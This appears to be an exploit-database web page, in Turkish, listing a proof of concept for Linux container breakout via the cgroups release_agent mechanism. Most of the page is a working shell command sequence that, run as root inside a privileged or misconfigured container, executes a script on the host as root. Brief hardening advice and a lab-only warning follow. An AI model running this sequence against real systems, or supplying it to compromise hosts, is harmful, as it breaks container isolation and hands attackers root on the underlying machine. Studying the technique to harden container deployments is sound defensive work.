Siber Alem / Detail / 266 / Linux-x64-container-breakout-cgroups-release-agent-poc-shellcode
vuln_report_viewer.sh
VULN REPORT / shellcode / ID: 266

Linux/x64 Container Breakout - cgroups release_agent PoC Shellcode

2026-07-21
2 görüntülenme
Doğrulandı
Linux x64 container

Özet

Bu kayıt, hedef sistemde bulunan bir zafiyeti detaylandırmaktadır. Zafiyet 2026-07-21 tarihinde yayınlanmış olup, topluluktan 2 görüntülenme almıştır. shellcode kategorisinde sınıflandırılmıştır. Kullanıcıların teknik detaylar için Detay sekmesindeki kaynak kodunu incelemeleri önerilir.

exploit_266.txt

Modern Container Escape - Linux x64 - PoC

Container Breakout - cgroups release_agent Exploit PoC

Privileged container veya hatali cgroup ayarlarinda, container icinden host kernel uzerinde kod calistirmak mumkundur. CTF ve red team tatbikatlarinda sik karsilasilan teknik.

cgroups release_agent Exploit

# Container icinde root yetkisiyle: mkdir /tmp/cgrp mount -t cgroup -o memory cgroup /tmp/cgrp mkdir /tmp/cgrp/x echo 1 > /tmp/cgrp/x/notify_on_release echo "$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /proc/mounts)/cmd" \ > /tmp/cgrp/release_agent echo '#!/bin/sh' > /cmd echo 'id > /output' >> /cmd chmod +x /cmd sh -c "echo $$ > /tmp/cgrp/x/cgroup.procs" cat /output # uid=0(root) -- HOST root!

Koruma

--privileged kullanmayin Seccomp ile syscall'lari kisitlayin AppArmor/SELinux profili uygulayın cgroupv2 (unified) daha guclu izolasyon Pod Security Admission: restricted policy

UYARI Lab Ortami

Bu PoC yalnizca izinli CTF/lab ortamlarinda calistirin.

Yazar Profili

HitThemHard
HitThemHard Seçkin Üye
Tüm Gönderilerini Gör

Kayıt İstatistikleri

Görüntülenme 2
İndirmeler 0
Yorumlar 0